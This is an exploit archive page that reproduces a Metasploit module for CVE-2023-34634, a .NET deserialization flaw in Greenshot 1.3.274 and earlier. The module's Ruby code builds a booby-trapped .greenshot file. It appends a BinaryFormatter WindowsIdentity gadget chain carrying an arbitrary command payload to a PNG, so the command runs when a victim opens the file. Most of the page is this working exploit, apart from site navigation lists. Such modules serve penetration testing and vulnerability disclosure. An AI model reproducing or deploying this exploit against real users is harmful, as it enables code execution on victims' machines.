Greenshot 1.3.274 Deserialization / Command Execution

Greenshot 1.3.274 Deserialization / Command Execution: Posted Aug 17, 2023; Authored by bwatters-r7, p4r4bellum | Site metasploit.com; There exists a .NET deserialization vulnerability in Greenshot versions 1.3.274 and below. The deserialization allows the execution of commands when a user opens a Greenshot file. The commands execute under the same permissions as the Greenshot service. Typically, it is the logged in user.; tags | exploit; advisories | CVE-2023-34634; SHA-256 | 417583375a798246fd4576d2e33b79c589cc0fa3d06430926abf50d5142f368a; Download | Favorite | View

Greenshot 1.3.274 Deserialization / Command Execution

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::FILEFORMAT
  include Msf::Post::File

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Greenshot .NET Deserialization Fileformat Exploit',
        'Description' => %q{
          There exists a .NET deserialization vulnerability in Greenshot version 1.3.274
          and below.  The deserialization allows the execution of commands when a user opens
          a Greenshot file.  The commands execute under the same permissions as the Greenshot
          service.  Typically, is the logged in user.
        },
        'DisclosureDate' => '2023-07-26',
        'Author' => [
          'p4r4bellum',  # Discovery
          'bwatters-r7', # msf exploit
        ],
        'References' => [
          ['CVE', '2023-34634'],
          ['EDB', '51633']
        ],
        'License' => MSF_LICENSE,
        'Platform' => 'win',
        'Arch' => ARCH_CMD,
        'Targets' => [
          [ 'Windows', {} ],
        ],
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'Reliability' => [REPEATABLE_SESSION],
          'SideEffects' => [ARTIFACTS_ON_DISK, SCREEN_EFFECTS]
        }
      )
    )

    register_options([
      OptPath.new('PNG_FILE', [false, 'PNG file to use'])
    ])
  end

  def exploit
    if datastore['PNG_FILE'].blank?
      image_file = File.join(Msf::Config.data_directory, 'exploits', 'cve-2023-34634', 'test.png')
    else
      image_file = datastore['PNG_FILE']
    end

    datastore['FILENAME'] = Rex::Text.rand_text_alpha(rand(6..13)) if datastore['FILENAME'].blank?
    if datastore['FILENAME'].length < 10 || datastore['FILENAME'][-10, -1] != '.greenshot'
      datastore['FILENAME'] << '.greenshot'
    end
    cmd = payload.encoded

    image_data = File.binread(image_file)

    deserialize_cmd = ::Msf::Util::DotNetDeserialization.generate(
      cmd,
      gadget_chain: :WindowsIdentity,
      formatter: :BinaryFormatter
    )

    payload_length = deserialize_cmd.length
    outfile = image_data
    outfile << deserialize_cmd
    outfile << [payload_length].pack('Q')
    outfile << 'Greenshot01.02'
    file_create(outfile)
  end
end

Top Authors In Last 30 Days

Red Hat 225 files
indoushka 116 files
Ubuntu 84 files
Gentoo 36 files
Jasper Nota 25 files
Debian 19 files
Willem Westerhof 19 files
Jim Blankendaal 11 files
Apple 9 files
Martijn Baalman 9 files

File Archives

Systems

AIX (429)
Apple (2,099)
BSD (377)
CentOS (58)
Cisco (1,927)
Debian (7,101)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,567)
HPUX (880)
iOS (378)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (50,815)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (489)
RedHat (16,569)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,756)
UNIX (9,438)
UnixWare (187)
Windows (6,674)
Other

Greenshot 1.3.274 Deserialization / Command Execution

Greenshot 1.3.274 Deserialization / Command Execution

File Archive:

August 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

Greenshot 1.3.274 Deserialization / Command Execution

Share This

Greenshot 1.3.274 Deserialization / Command Execution

File Archive:

August 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems